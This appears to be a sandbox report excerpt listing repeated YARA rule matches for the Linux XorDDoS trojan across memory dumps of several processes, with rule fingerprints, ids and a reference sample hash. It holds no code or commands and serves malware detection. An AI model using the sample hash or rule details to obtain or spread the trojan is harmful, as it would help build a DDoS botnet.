        Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6473.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6473.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6473.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6473.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6473.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6473.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6204.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6204.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6204.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6204.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6204.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6204.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
